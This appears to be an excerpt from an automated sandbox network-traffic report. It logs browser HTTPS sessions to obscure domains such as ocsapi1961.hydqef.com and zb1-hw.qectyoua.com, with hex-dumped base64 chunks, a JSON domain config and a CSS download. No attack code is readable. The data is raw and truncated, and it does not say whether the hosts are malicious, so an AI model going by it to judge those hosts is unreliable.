                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 2f 42 65 67 6f 41 6d 67 47 71 7a 6d 30 53 44 7a 64 5a 55 6e 56 64 41 4d 73 57 34 41 6d 69 75 30 69 32 62 74 4e 6b 70 31 68 5a 67 77 77 69 45 47 56 4e 35 66 76 64 55 41 72 34 4d 41 57 71 30 61 6f 75 38 33 48 44 36 50 79 76 4e 52 38 45 34 7a 58 41 64 76 64 32 2f 54 4f 6f 78 67 44 30 49 43 43 79 6c 66 55 41 43 44 38 42 59 4d 78 41 67 2f 45 34 73 49 2b 77 41 30 39 76 79 61 67 76 47 67 38 71 79 52 64 44 6e 76 71 70 48 6d 4a 35 39 64 74 68 39 74 41 59 2b 36 71 4c 41 58 62 53 6a 55 2f 39 77 6a 32 70 69 42 6d 2f 43 6f 4e 53 67 31 38 65 5a 39 73 6c 62 54 6c 35 64 44 53 43 63 6c 47 37 67 30 37 35 34 39 50 49 41 65 4a 79 4b 47 71 79 58 35 51 67 46 6f 63 53 5a 4a 50 7a 5a 6c 71 47 47 76 39 43 41 53 75 35 4f 67 7a 66 2f 6d 57 49 54 59 45 59 42 71 6c 61 4b 4c 31 56 36
                                                                                                                                                          Data Ascii: /BegoAmgGqzm0SDzdZUnVdAMsW4Amiu0i2btNkp1hZgwwiEGVN5fvdUAr4MAWq0aou83HD6PyvNR8E4zXAdvd2/TOoxgD0ICCylfUACD8BYMxAg/E4sI+wA09vyagvGg8qyRdDnvqpHmJ59dth9tAY+6qLAXbSjU/9wj2piBm/CoNSg18eZ9slbTl5dDSCclG7g07549PIAeJyKGqyX5QgFocSZJPzZlqGGv9CASu5Ogzf/mWITYEYBqlaKL1V6
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 38 58 36 46 32 42 63 71 59 51 6c 34 49 50 4b 58 58 49 44 30 4b 63 59 65 45 46 76 53 66 67 79 46 77 4a 64 6b 58 41 51 43 41 42 77 41 36 41 45 34 44 45 58 56 35 7a 70 65 43 58 78 35 30 35 44 34 56 33 49 47 43 44 73 45 6c 32 73 62 51 65 6c 63 41 44 79 43 37 61 4e 46 79 5a 44 47 67 70 43 6e 61 4d 35 73 70 6c 54 37 33 33 45 6a 49 4d 62 52 5a 64 57 49 49 47 43 5a 41 31 50 4e 58 69 71 58 77 41 4b 33 35 79 58 30 73 43 4d 4a 50 49 36 41 44 63 37 59 4b 52 34 4a 62 42 2f 4a 53 67 4a 62 44 75 58 45 41 4b 5a 58 58 51 58 49 46 36 41 39 43 70 4a 45 6c 64 31 6b 6b 63 46 6f 44 47 30 6b 63 42 41 41 75 41 67 73 42 44 41 65 58 52 34 4c 5a 66 69 41 4a 46 7a 4f 66 67 58 50 35 36 55 41 49 58 76 35 35 67 41 74 58 6b 63 42 47 44 47 67 44 6c 36 2b 63 59 58 48 35 31 68 65 6c 41 46
                                                                                                                                                          Data Ascii: 8X6F2BcqYQl4IPKXXID0KcYeEFvSfgyFwJdkXAQCABwA6AE4DEXV5zpeCXx505D4V3IGCDsEl2sbQelcADyC7aNFyZDGgpCnaM5splT733EjIMbRZdWIIGCZA1PNXiqXwAK35yX0sCMJPI6ADc7YKR4JbB/JSgJbDuXEAKZXXQXIF6A9CpJEld1kkcFoDG0kcBAAuAgsBDAeXR4LZfiAJFzOfgXP56UAIXv55gAtXkcBGDGgDl6+cYXH51helAF
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 6c 79 35 75 58 6b 69 69 75 56 51 48 44 75 55 43 31 65 72 52 56 7a 53 50 77 64 6c 56 73 6c 6b 59 50 39 70 5a 4d 44 41 41 71 6d 5a 35 79 44 34 58 2f 53 50 30 4e 39 61 73 79 34 78 55 4f 55 73 78 55 37 37 56 50 53 65 32 41 62 48 4a 41 43 32 42 61 55 76 47 68 49 6f 43 78 57 30 6f 4e 47 58 66 79 37 42 58 4d 4b 71 55 55 76 43 76 39 6f 7a 73 31 44 6a 4d 4b 6e 68 69 6c 67 52 7a 42 63 38 33 43 43 4d 4b 6e 78 55 6d 77 66 4b 6c 76 79 2f 64 6d 4a 61 47 6f 52 43 67 43 48 6e 4e 4d 7a 66 69 5a 38 2f 39 42 56 59 41 4a 56 41 4b 6f 4a 58 52 4b 7a 61 7a 66 45 58 65 57 4a 4b 34 33 53 4f 67 77 34 55 70 79 71 44 42 72 55 6b 42 57 6c 32 4f 4d 62 33 44 52 32 58 6b 38 6b 42 56 6d 4b 76 4a 56 67 67 48 77 41 46 4b 34 55 41 74 42 59 70 56 73 4b 6a 7a 68 79 30 52 57 67 4b 4b 68 65 42
                                                                                                                                                          Data Ascii: ly5uXkiiuVQHDuUC1erRVzSPwdlVslkYP9pZMDAAqmZ5yD4X/SP0N9asy4xUOUsxU77VPSe2AbHJAC2BaUvGhIoCxW0oNGXfy7BXMKqUUvCv9ozs1DjMKnhilgRzBc83CCMKnxUmwfKlvy/dmJaGoRCgCHnNMzfiZ8/9BVYAJVAKoJXRKzazfEXeWJK43SOgw4UpyqDBrUkBWl2OMb3DR2Xk8kBVmKvJVggHwAFK4UAtBYpVsKjzhy0RWgKKheB
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 75 4f 31 35 69 4d 63 35 33 6e 4e 33 70 34 78 74 4c 4b 31 65 30 66 53 6a 63 4f 49 65 72 49 55 6f 52 69 63 50 74 57 37 2b 31 6f 52 75 31 55 34 52 76 76 4d 34 65 75 64 76 59 52 6f 39 78 4d 61 70 36 32 63 35 68 6e 31 41 65 6c 5a 55 6b 4e 69 44 31 7a 74 72 39 73 52 43 54 54 32 64 43 31 4e 58 66 74 70 44 76 70 71 39 39 55 34 52 2f 75 73 51 4e 6c 6d 74 77 52 61 51 6e 7a 63 2f 44 4e 36 46 35 6b 31 72 31 6e 2f 4d 4c 70 34 31 4f 45 64 68 79 6b 67 4e 73 52 74 33 56 4d 6a 73 38 67 55 31 4d 37 70 6e 68 50 4d 2b 6e 32 67 2f 78 30 72 4d 74 78 33 51 75 30 64 6f 6a 74 6f 46 6c 6a 4e 47 75 79 6a 7a 39 57 78 55 42 69 70 72 63 30 2b 49 4e 47 6d 37 6d 77 56 31 69 67 4f 6e 6c 74 52 76 53 74 54 6c 30 39 74 55 69 32 39 4e 4c 71 68 43 76 57 41 56 61 57 51 78 4f 31 6b 56 48 51 45
                                                                                                                                                          Data Ascii: uO15iMc53nN3p4xtLK1e0fSjcOIerIUoRicPtW7+1oRu1U4RvvM4eudvYRo9xMap62c5hn1AelZUkNiD1ztr9sRCTT2dC1NXftpDvpq99U4R/usQNlmtwRaQnzc/DN6F5k1r1n/MLp41OEdhykgNsRt3VMjs8gU1M7pnhPM+n2g/x0rMtx3Qu0dojtoFljNGuyjz9WxUBiprc0+INGm7mwV1igOnltRvStTl09tUi29NLqhCvWAVaWQxO1kVHQE
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 4f 62 59 46 57 70 6a 6f 41 44 68 6d 70 62 42 69 73 33 75 35 53 46 2f 4a 47 6a 68 4e 2b 37 2b 51 4d 79 45 38 72 36 2b 32 48 61 79 52 6e 69 73 75 70 56 65 78 75 69 34 2b 4c 77 67 55 6a 41 72 6d 67 6c 41 6d 6d 78 53 57 41 78 42 37 54 68 2f 4b 4a 48 59 68 4a 52 30 41 49 57 63 4c 67 69 37 78 41 54 53 49 2b 7a 6c 41 4c 58 6f 5a 49 45 75 77 4e 79 45 6b 6b 79 38 5a 4f 53 42 50 4c 53 53 54 49 38 30 58 76 68 77 47 43 46 61 35 35 68 58 32 45 2f 41 6e 34 41 71 70 43 42 59 53 4c 37 6b 6f 42 67 51 4f 54 43 36 59 4b 63 75 67 76 42 78 41 45 78 30 4a 63 45 68 6e 4f 51 41 5a 6f 49 73 62 6a 47 73 63 68 4c 41 34 65 34 49 64 47 45 56 73 4d 72 68 30 76 49 44 76 74 56 77 73 54 43 70 49 62 65 41 68 78 61 36 47 74 50 41 72 37 51 62 4a 44 72 68 4a 63 46 36 34 57 68 68 63 77 70 47
                                                                                                                                                          Data Ascii: ObYFWpjoADhmpbBis3u5SF/JGjhN+7+QMyE8r6+2HayRnisupVexui4+LwgUjArmglAmmxSWAxB7Th/KJHYhJR0AIWcLgi7xATSI+zlALXoZIEuwNyEkky8ZOSBPLSSTI80XvhwGCFa55hX2E/An4AqpCBYSL7koBgQOTC6YKcugvBxAEx0JcEhnOQAZoIsbjGschLA4e4IdGEVsMrh0vIDvtVwsTCpIbeAhxa6GtPAr7QbJDrhJcF64WhhcwpG
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 6d 42 48 38 41 43 5a 30 50 6c 6a 5a 71 61 52 39 58 6d 57 65 61 69 41 79 35 6c 31 4d 50 4e 35 33 51 6a 64 67 71 6e 75 44 6a 34 56 4a 48 6f 41 71 33 6e 4d 41 4f 74 35 72 4b 43 62 65 51 31 35 32 33 6d 51 67 45 45 41 75 33 6b 6e 4f 4b 64 35 68 33 6b 56 75 62 52 47 33 7a 6e 6e 65 62 45 77 4d 68 6b 55 4c 74 64 35 52 6e 67 6d 32 43 39 35 7a 4b 6c 65 31 4c 64 35 57 72 6b 50 65 57 4e 35 39 37 4b 72 35 4f 70 77 47 66 6a 54 6d 64 6a 51 50 37 6e 5a 79 53 4e 35 62 33 6b 34 2b 5a 6d 67 43 47 67 59 2b 59 44 77 35 6e 6d 4d 65 51 31 35 75 50 6c 76 6f 41 54 77 73 62 6d 79 2b 65 6a 71 63 53 37 53 75 52 6f 67 30 76 6b 4b 41 44 44 35 38 76 6d 39 68 49 72 35 64 30 70 6b 34 43 72 35 44 58 6b 77 2b 66 4a 59 6d 76 6b 36 53 53 4b 45 38 69 7a 59 2b 52 44 5a 4c 79 78 61 34 4e 4b 35
                                                                                                                                                          Data Ascii: mBH8ACZ0PljZqaR9XmWeaiAy5l1MPN53QjdgqnuDj4VJHoAq3nMAOt5rKCbeQ1523mQgEEAu3knOKd5h3kVubRG3znnebEwMhkULtd5Rngm2C95zKle1Ld5WrkPeWN597Kr5OpwGfjTmdjQP7nZySN5b3k4+ZmgCGgY+YDw5nmMeQ15uPlvoATwsbmy+ejqcS7SuRog0vkKADD58vm9hIr5d0pk4Cr5DXkw+fJYmvk6SSKE8izY+RDZLyxa4NK5
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 4e 41 4a 6c 4f 42 67 69 7a 67 5a 77 41 49 63 69 7a 67 65 36 73 56 38 59 6e 49 2f 67 42 73 5a 6e 4d 71 49 38 44 6a 75 4f 69 44 64 43 4e 6a 74 56 57 30 34 37 67 38 6c 6b 63 6f 70 62 66 31 78 69 4f 30 36 65 44 79 67 4b 42 43 76 5a 49 42 41 47 72 67 32 34 49 54 74 35 50 42 34 37 5a 31 35 36 4f 32 77 34 6d 4a 79 78 77 48 33 4f 4b 37 75 78 76 7a 6e 31 48 51 57 58 51 69 51 34 41 39 74 49 53 33 79 36 41 39 74 4a 59 42 4a 39 48 6f 73 45 53 44 7a 4f 42 45 67 5a 4e 43 77 55 4f 6e 6f 6a 59 46 49 6a 46 33 5a 4b 57 71 34 37 57 64 77 64 36 72 45 2b 4f 44 74 4b 77 7a 48 61 6e 30 6b 47 75 36 44 4e 6a 46 35 5a 4e 53 35 6b 47 74 67 44 6b 43 4b 6c 70 55 2b 5a 78 42 43 4a 4a 57 6b 45 4f 54 6b 7a 4a 52 68 48 47 32 6f 67 4b 44 2b 78 57 30 7a 72 68 36 41 62 43 43 46 62 56 77 41
                                                                                                                                                          Data Ascii: NAJlOBgizgZwAIcizge6sV8YnI/gBsZnMqI8DjuOiDdCNjtVW047g8lkcopbf1xiO06eDygKBCvZIBAGrg24ITt5PB47Z156O2w4mJyxwH3OK7uxvzn1HQWXQiQ4A9tIS3y6A9tJYBJ9HosESDzOBEgZNCwUOnojYFIjF3ZKWq47Wdwd6rE+ODtKwzHan0kGu6DNjF5ZNS5kGtgDkCKlpU+ZxBCJJWkEOTkzJRhHG2ogKD+xW0zrh6AbCCFbVwA
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 36 5a 6c 46 75 71 6b 59 57 6f 75 77 42 66 75 35 34 42 33 70 76 4b 67 56 7a 33 61 46 73 63 51 50 70 43 4b 63 4b 68 2b 37 33 62 51 38 77 4c 4e 61 57 37 74 31 42 32 55 54 69 68 37 38 42 6c 47 46 79 44 77 41 48 36 44 50 43 7a 31 43 44 74 7a 48 75 50 69 65 4c 31 41 35 54 50 65 38 48 41 39 68 5a 50 70 6b 7a 56 41 52 4f 4e 36 32 48 52 4a 30 54 42 66 41 35 65 2b 37 2f 44 4b 43 4e 37 42 2f 6b 44 71 43 49 68 4e 6b 32 31 36 43 47 55 63 68 67 69 67 44 58 77 4e 67 51 68 57 43 46 42 6a 39 67 6a 55 38 49 34 49 7a 67 69 75 43 4a 49 38 37 67 6a 68 66 73 39 55 50 67 67 53 38 35 2f 31 46 67 69 2b 54 43 45 49 52 51 6a 68 43 4d 49 4e 70 67 41 78 43 48 45 49 75 67 69 4a 43 48 73 4d 4b 51 69 78 41 51 6b 49 39 54 6f 35 43 49 62 47 4f 75 43 46 43 4f 68 6a 4f 55 6e 6c 43 4e 42 6a
                                                                                                                                                          Data Ascii: 6ZlFuqkYWouwBfu54B3pvKgVz3aFscQPpCKcKh+73bQ8wLNaW7t1B2UTih78BlGFyDwAH6DPCz1CDtzHuPieL1A5TPe8HA9hZPpkzVARON62HRJ0TBfA5e+7/DKCN7B/kDqCIhNk216CGUchgigDXwNgQhWCFBj9gjU8I4IzgiuCJI87gjhfs9UPggS85/1Fgi+TCEIRQjhCMINpgAxCHEIugiJCHsMKQixAQkI9To5CIbGOuCFCOhjOUnlCNBj
                                                                                                                                                          2024-06-09 22:41:00 UTC4498INData Raw: 68 6b 68 6b 32 50 55 37 6d 41 54 31 44 77 64 48 36 78 42 31 41 49 30 52 33 4e 57 77 77 76 55 55 4d 4f 61 36 66 48 62 43 4f 76 73 63 33 65 55 32 39 53 6d 31 46 66 78 34 54 41 48 31 4d 7a 55 78 65 34 68 52 32 66 55 75 4d 56 58 31 47 70 39 34 46 52 79 63 30 55 74 54 39 53 55 4e 4b 2f 55 37 39 54 55 4e 46 2f 55 6c 41 43 2f 31 47 45 41 2f 39 51 45 65 77 73 41 6d 74 53 67 4e 46 73 49 56 65 75 51 4e 50 7a 6e 37 61 69 4d 61 31 6d 41 38 44 54 4d 35 30 67 30 44 47 53 6f 4e 4a 4e 4e 57 44 53 71 4e 48 67 30 58 52 69 57 71 49 51 30 63 31 52 6b 76 57 4b 31 4b 31 51 55 4e 43 2f 55 6b 75 64 48 30 4b 47 62 39 44 52 6f 4e 49 75 73 7a 44 52 46 32 31 79 59 66 2b 69 37 52 62 66 55 76 44 54 72 5a 2b 6a 6b 47 75 64 73 35 7a 75 34 6f 6a 51 63 6f 37 5a 51 58 4b 4f 6c 62 44 49 30
                                                                                                                                                          Data Ascii: hkhk2PU7mAT1DwdH6xB1AI0R3NWwwvUUMOa6fHbCOvsc3eU29Sm1Ffx4TAH1MzUxe4hR2fUuMVX1Gp94FRyc0UtT9SUNK/U79TUNF/UlAC/1GEA/9QEewsAmtSgNFsIVeuQNPzn7aiMa1mA8DTM50g0DGSoNJNNWDSqNHg0XRiWqIQ0c1RkvWK1K1QUNC/UkudH0KGb9DRoNIuszDRF21yYf+i7RbfUvDTrZ+jkGuds5zu4ojQco7ZQXKOlbDI0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          213192.168.2.549959163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC365OUTGET /ocs/zbw?r=8092400775 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC488INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:00 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache21.l2hk3[3,0], cache19.l2sg3[40,0], ens-cache13.de5[240,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55ca117179728605413047e
                                                                                                                                                          2024-06-09 22:41:00 UTC11101INData Raw: 32 62 35 35 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c
                                                                                                                                                          Data Ascii: 2b55{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-l
                                                                                                                                                          2024-06-09 22:41:00 UTC1467INData Raw: 35 62 34 0d 0a 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 32 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 33 22 3a 20 7b 22 76 22 3a 22 32 32 30 38 31 35 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 34 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 35 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 36 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 37 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74
                                                                                                                                                          Data Ascii: 5b4v":"221007-01","t":104},"t3862": {"v":"230607-01","t":101},"t3863": {"v":"220815-01","t":108},"t3864": {"v":"221007-01","t":108},"t3865": {"v":"221007-01","t":104},"t3866": {"v":"240516-03","t":101},"t3867": {"v":"221007-01","t":101},"t
                                                                                                                                                          2024-06-09 22:41:01 UTC2927INData Raw: 62 36 38 0d 0a 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 30 34 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 30 35 22 3a 20 22 32 33 30 36 30 37 2d 30 31 22 2c 0a 09 22 74 33 39 30 39 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 31 30 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 39 7d 2c 0a 09 22 74 33 39 31 32 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 31 34 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 31 37 22 3a 20 7b 22 76 22 3a 22 32 33 30 33 31 32 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 39 31 38 22 3a 20 7b 22
                                                                                                                                                          Data Ascii: b68230620-01","t":104},"t3904": "231005-01","t3905": "230607-01","t3909": {"v":"230607-01","t":108},"t3910": {"v":"240516-03","t":109},"t3912": "231005-01","t3914": {"v":"230620-01","t":108},"t3917": {"v":"230312-01","t":101},"t3918": {"
                                                                                                                                                          2024-06-09 22:41:01 UTC2922INData Raw: 62 36 33 0d 0a 36 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 30 32 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 34 30 31 37 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 30 32 2d 30 31 22 2c 22 74 22 3a 31 31 31 7d 2c 0a 09 22 74 34 30 31 38 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 34 30 31 39 22 3a 20 7b 22 76 22 3a 22 32 33 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 38 7d 2c 0a 09 22 74 34 30 32 30 22 3a 20 7b 22 76 22 3a 22 32 33 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 31 7d 2c 0a 09 22 74 34 30 32 31 22 3a 20 22 32 34 30 35 30 32 2d 30 31 22 2c 0a 09 22 74 34 30 32 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 33 7d 2c 0a 09 22 74 34 30 32 33 22 3a 20 22
                                                                                                                                                          Data Ascii: b636": {"v":"240502-01","t":101},"t4017": {"v":"240502-01","t":111},"t4018": {"v":"240516-03","t":101},"t4019": {"v":"231005-01","t":118},"t4020": {"v":"231005-01","t":111},"t4021": "240502-01","t4022": {"v":"240516-03","t":103},"t4023": "
                                                                                                                                                          2024-06-09 22:41:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          214192.168.2.54996190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC559OUTGET /pc/240516-03/static/css/t4045.css HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:00 GMT
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 462291
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:31 GMT
                                                                                                                                                          ETag: "6645ca3f-70dd3"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[7],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE4[6],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,5],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467557
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d7226c9efbc30eba34e1d83fedb590db
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124444
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:00 UTC15767INData Raw: 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 30 31 62 31 35 20 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 74 75 74 6f 72 69 61 6c 2f 62 69 67 2d 62 67 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 62 6f 74 74 6f 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 3a 61 66 74 65 72 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 3a 62 65 66 6f 72
                                                                                                                                                          Data Ascii: .tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:befor
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 2d 77 72 61 70 70 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 7d 23 61 63 2d 2d 77 72 61 70 70 65 72 20 2e 61 63 74 69 76 69 74 79 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 64 72 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b
                                                                                                                                                          Data Ascii: op-down-menu .menu-wrapper .grid-wrapper{width:100%;display:-ms-flexbox;display:flex;position:absolute;top:0;left:0;transition:.3s}#ac--wrapper .activity_container .drop-down-menu .menu-wrapper .grid{display:-ms-flexbox;display:flex;-ms-flex-align:center;
